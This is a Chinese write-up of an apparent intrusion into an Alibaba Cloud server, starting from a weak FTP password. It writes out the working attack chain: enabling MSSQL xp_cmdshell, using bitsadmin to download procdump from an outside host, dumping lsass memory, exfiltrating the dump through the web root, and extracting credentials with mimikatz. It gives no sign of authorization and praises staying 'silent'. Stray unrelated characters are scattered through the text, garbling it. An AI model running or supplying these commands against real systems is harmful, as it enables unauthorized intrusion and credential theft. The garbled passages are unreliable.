前言
無意中遇到ftp弱口令踏枣,以為沒什么卵用琴拧。沒想到一個(gè)小細(xì)節(jié)導(dǎo)致服務(wù)器直接搞定。
信息收集
IP為阿里云118.19.xx.xx徽缚、開放大量端口21,22,80,81,1433,3389,8888等等
ftp弱口令
指紋識(shí)別發(fā)現(xiàn)81端口為serv-u軟件贩汉。一個(gè)弱口令ftp/ftp直接登錄驱富。原以為ftp用來傳輸文件作用不大,沒想到無意中翻找到了web.config的敏感文件匹舞。
打開很明顯看到sql server的配置信息褐鸥。
mssql命令執(zhí)行
開啟xp_cmdshell組件
exec sp_configure 'show advanced options',1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;
直接執(zhí)行系統(tǒng)命令
exec master.dbo.xp_cmdshell 'whoami';
因?yàn)榘⒗镌品?wù)器的原因,想著直接激活guest用戶赐稽,結(jié)果在添加到管理員組的時(shí)候并沒有成功叫榕。查看進(jìn)程浑侥,發(fā)現(xiàn)存在防護(hù)aliyundun.exe
那采用prodump導(dǎo)出lsass.dmp,然后從web下載到本地晰绎,再使用mimikatz讀取密碼寓落。
此時(shí)有一個(gè)問題,web的絕對(duì)路徑還不知道荞下。
web路徑查找
該IP的8888端口正常運(yùn)行著web服務(wù)伶选,為一login.aspx登錄地址。
dir搜索logon.aspx
exec master.dbo.xp_cmdshell 'cd /d E: && dir /b /s Logon.aspx'
找到網(wǎng)站絕對(duì)路徑尖昏,就簡單啦~
dump hash
從公網(wǎng)上下載prodump.exe下載到靶機(jī)上仰税。
exec master.dbo.xp_cmdshell 'bitsadmin /transfer myDownLoadJob /download /priority normal "http://144.34.xxx.xxx/procdump64.exe" "C:\\Windows\\system32\\procdump.exe"'
procdump.exe -accepteula -ma lsass.exe lsass.dmp
導(dǎo)出lsass.dmp
再copy lsass.dmp到網(wǎng)站根目錄下。需要重命名為txt后綴名抽诉。
exec master.dbo.xp_cmdshell 'copy lsass.dmp "E:\Program Files\DESS.Web\tmp.txt"'
需要注意的是:
因?yàn)閣indows文件夾名稱中間沒有空格陨簇,如果文件夾名(或者目錄名)中有空格,就必須加雙引號(hào)了
訪問tmp.txt下載掸鹅。然后本地的mimikatz讀取即可塞帐。
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
總結(jié)
不要放過任何一個(gè)細(xì)節(jié)。而且這次成功滲透巍沙,我發(fā)現(xiàn)全程以靜默化狀態(tài)運(yùn)行葵姥,沒有掛馬,沒有惡意掃描句携。